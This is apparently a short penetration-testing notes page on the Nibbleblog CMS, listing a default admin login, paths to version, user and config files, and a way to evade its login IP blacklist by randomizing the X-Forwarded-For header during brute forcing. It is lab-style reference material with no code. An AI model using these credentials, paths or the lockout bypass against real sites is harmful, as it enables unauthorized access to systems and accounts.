Nibble

web, enum, cms, php

Overview #

Default Credentials #

admin:<none>

Interesting URL Paths #

# contains version
/README
/admin/boot/rules/98-constants.bit

# contains users
/content/private/users.xml

# others
/admin.php
/admin/
/content/
/content/private/plugins/my_image/db.xml
/content/private/config.xml

IP Blacklisting #

Nibbleblog blacklists an IP address for five minutes after five unsuccessful login attempts. We can confirm this configuration by checking the source code .

This can be bypassed by randomizing the X-Forwarded-For header. See bruteforce tool below.

Exploits #

Tools #

References #